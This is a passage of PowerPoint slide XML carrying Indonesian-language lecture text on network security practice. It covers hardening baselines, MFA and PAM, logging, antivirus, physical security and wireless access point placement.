              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> STIG.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MFA), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PAM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencatatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Solusi Antivirus dan Antimalware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkarantina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</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198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419722688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Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nirkabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Pita 5 GHz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tumpang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tindih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Perhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> bandwidth, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>interferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (WAP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
